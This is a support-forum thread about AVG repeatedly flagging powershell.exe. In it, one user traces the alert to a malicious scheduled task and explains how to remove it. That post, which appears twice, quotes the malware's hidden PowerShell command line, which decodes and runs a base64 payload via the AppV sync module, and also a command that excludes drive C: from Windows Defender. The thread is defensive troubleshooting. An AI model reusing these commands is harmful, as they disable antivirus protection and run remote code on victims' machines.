Since I got my AVG free about 5 months ago it keeps detecting 'powershell.exe' as a threat even though I have said that it was safe by putting it into 'exceptions'. I want to know how I can fix this because its very irritating!
(For some reason I cannot use my screenshot that I took of the problem but it looks the exact same as everyone else's powershell problem)
There was a task created in Task Scheduler that is starting PowerShell.exe passing some parameters to it. This parameters are base64 encoded.
In my case was:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
The payload from system-logs.txt is using SyncAppvPublishingServer.vbs to connect online to a malware server and download a script for executing in PowerShell. This way PowerShell thinks that the downloaded script is signed by Microsoft and it starts to run.
After that, powershell will get rid of Windows Defender and will do whatever it wants to 
powershell -Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:'
AVG did a good job by now, removing system-logs.txt, setup.exe and OneDrive.exe .
All I had to do to get rid of that pop up from AVG was to delete the scheduled task from Task-Scheduler
Microsoft > Windows > NetService > Network.
Delete everything in there, NetService folder too!
I have used Procmon64.exe to detect all of this, and I have not slept all night, so… sorry if I made some mistakes in this comment.
Hello,
Thank you for sharing the screenshot with us. Could you please confirm whether have you updated virus database and updated the AVG program? If not, please refer the below article to update it :
Updating Virus definitions and AVG AntiVirus application version
Please try the above steps and let us know whether you still get the error. We look forward for your response.
Heres the requested image. Also I am currently on Windows 10.
Heres the requested image. Also I am currently on Windows 10.
There was a task created in Task Scheduler that is starting PowerShell.exe passing some parameters to it. This parameters are base64 encoded.
In my case was:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer n; $a=Get-Content C:\Windows\logs\system-logs.txt | Select -Index 17033;$script_decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a)); $script_block = [Scriptblock]::Create($script_decoded);Invoke-Command $script_block}
The payload from system-logs.txt is using SyncAppvPublishingServer.vbs to connect online to a malware server and download a script for executing in PowerShell. This way PowerShell thinks that the downloaded script is signed by Microsoft and it starts to run.
After that, powershell will get rid of Windows Defender and will do whatever it wants to
powershell -Start-Sleep -Seconds 10; Set-MpPreference -ExclusionPath 'C:'
AVG did a good job by now, removing system-logs.txt, setup.exe and OneDrive.exe .
All I had to do to get rid of that pop up from AVG was to delete the scheduled task from Task-Scheduler
Microsoft > Windows > NetService > Network.
Delete everything in there, NetService folder too!
I have used Procmon64.exe to detect all of this, and I have not slept all night, so… sorry if I made some mistakes in this comment.
Hello Stefan,
Thank you for writing back to us. We request you to create a separate AVG community post by clicking the link below and post your questions in your own post, so that we will check with your AVG account and help you with additional support.
https://support.avg.com/support_ask
Thank you.
Hello Taylor,
We are sorry for the inconvenience caused. We will check and help you to resolve it. Could you please share us the screenshot of the AVG detection?
Also, please confirm the device operating system to resolve the issue?
You can post the screenshot here in your topic. Click on Answer & then click on the Image [mountain symbol] & follow the instructions. Thanks in advance.